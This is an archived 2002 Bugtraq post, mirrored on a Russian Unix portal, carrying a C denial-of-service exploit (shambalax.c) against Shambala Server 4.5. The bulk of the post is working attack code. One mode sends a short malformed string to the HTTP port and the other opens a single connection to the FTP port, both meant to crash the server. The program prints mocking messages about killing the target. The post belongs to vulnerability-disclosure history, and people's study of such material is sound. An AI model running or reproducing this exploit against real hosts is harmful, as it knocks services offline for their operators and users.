The OpenNET Project / Index page
BSD, Linux, Cisco, Web, Palm, other unix
RUSSIAN version

Search
Выпущена CD-версия OpenNet.RU для оффлайн просмотра.
Для формирования заказа - перейдите по ссылке
.
SOFT - Unix Software catalog
LINKS - Unix resources
TOPIC - Articles from usenet
DOCUMENTATION - Unix guides
News | Tips | MAN | Forum | BUGs | LastSoft | Keywords | BOOKS (selected) | Linux HowTo | FAQ Archive

Exploit for previously reported DoS issues in Shambala Server 4.5


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
Date: Tue, 09 Jul 2002 10:46:42 +0200
From: Daniel =?ISO-8859-1?Q?Nystr=F6m?= <exce@netwinder.nu>
To: bugtraq@securityfocus.com
Subject: Exploit for previously reported DoS issues in Shambala Server 4.5

--------------040001080208000003030003
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 8bit

DoS exploit for previously discussed issues in Shambala Server 4.5.


-- 


/***********************************
* Daniel NystrЖm, Telhack 026 Inc. *
***********************************/

http://www.SweSec.tk
http://www.telhack.tk


--------------040001080208000003030003
Content-Type: text/plain;
 name="shambalax.c"
Content-Transfer-Encoding: 8bit
Content-Disposition: inline;
 filename="shambalax.c"

/******** shambalax.c ***********************************************************
*                                                       			*
* PoC exploit for the DoS in Shambala Server 4.5        			*
* as described in Telhack 026 Inc. S.A. #3 (BID:4897).  			*
* I have also built in a function that exploits another 			*
* DoS condition found by zillion a long long time ago.  			*
* Also refined my DoS a little bit by just using one                            *
* char that mess up Shambala.                                                   *
*                                                       			*
* By: Daniel NystrЖm (excE) <exce@netwinder.nu>         			*
*                                                       			*
*                                                       			*
* Notes:                                                                        *
* I found that zillion had only been almost right, it                           * 
* is not opening a lot of TCP connection that generates                         *
* the DoS that he found, it is just one TCP connection,                         *
* but it certainly has to do with bad connection handling                       *
* by Shambala.                                                                  *
*                                                                               *
*                                                                               *
*                                                                               *
* Credits:                                                                      *
* Zillion <zillion@safemode.org> - for discovering the FTP DoS                  *
*                                                       			*
* Greetz:                                                                       *
* Xenogen <*****@**********.***> - for promising to report any segfaults :)     *
* X-Rewt  <*****@**********.***> - Cuz he's in my school :P                     *
* Telhack 026 Inc. crew - STOP phreaking, START doing something more fun :))    *
*                                                                               *
*********************************************************** shambalax.c ********/

#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/socket.h>


int main(int argc, char *argv[])
{
	int sockfd;
	int port;
	int numbytes;
	
	struct sockaddr_in target;
	struct hostent *he;

	if (argc != 3)
	{
		fprintf(stderr, "\n-- Shambala Server 4.5 DoS exploit --\n");
		fprintf(stderr, "\nUsage: %s <target> <type>", argv[0]);
		fprintf(stderr, "\nTypes:");
		fprintf(stderr, "\n1  -  HTTPD DoS");
		fprintf(stderr, "\n2  -  FTP DoS\n\n");
		exit(1);
	}
	
	printf("\n-- Shambala Server 4.5 DoS exploit --\n\n");
	printf("-> Starting...\n");	
	printf("->\n");

	if ((he=gethostbyname(argv[1])) == NULL)
	{
		herror("gethostbyname");
		exit(1);
	}

	if ((sockfd=socket(AF_INET, SOCK_STREAM,0)) == -1)
	{
		perror("socket");
		exit(1);
	}

	/* HTTPD DoS */
	if(argv[2][0] == '1')
	{
		port = 80;
		target.sin_family = AF_INET;
		target.sin_port = htons(port);
		target.sin_addr = *((struct in_addr *)he->h_addr);
		bzero(&(target.sin_zero), 8);
		printf("-> Connecting to %s:80...\n", inet_ntoa(target.sin_addr));
		printf("->\n");
		if (connect(sockfd, (struct sockaddr *)&target, sizeof(struct sockaddr)) == -1)
		{
			perror("connect");
			exit(1);
		}
		printf("-> Sending httpd exploit string!! M4y th3 3v1L Shambala d13!!! :)\n");	
		printf("->\n");
		if(send(sockfd, "!\r\n", 3, 0) == -1)
		{
			perror("send");
			exit(1);
		}	
		close(sockfd);
	}
	else
	
	/* FTPD DoS */
	if(argv[2][0] == '2')
	{
                port = 21;
                target.sin_family = AF_INET;
                target.sin_port = htons(port);
                target.sin_addr = *((struct in_addr *)he->h_addr);
                bzero(&(target.sin_zero), 8);
                printf("-> Making a TCP connection (!which crashes server!) to %s:21...\n", inet_ntoa(target.sin_addr));
                printf("->\n");
                if (connect(sockfd, (struct sockaddr *)&target, sizeof(struct sockaddr)) == -1)
                {
                        perror("connect");
                        exit(1);
                }
                close(sockfd);
	}
	else
	{
		fprintf(stderr, "\n\nError: Bad type definition (use 1 or 2 for <type>).\n\n");
		exit(1);		
	}

	printf("-> Exploit finished nicely. %s's Shambala is probably dead by now.\n\n", argv[1]);

}

/* EOF - Shambala Server 4.5 DoS exploit     */
/* Daniel NystrЖm (excE) <exce@netwinder.nu> */

--------------040001080208000003030003--

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
Закладки
Добавить в закладки
Created 1996-2003 by Maxim Chirkov  
ДобавитьРекламаВебмастеруЦУПГИД  
SpyLOG TopList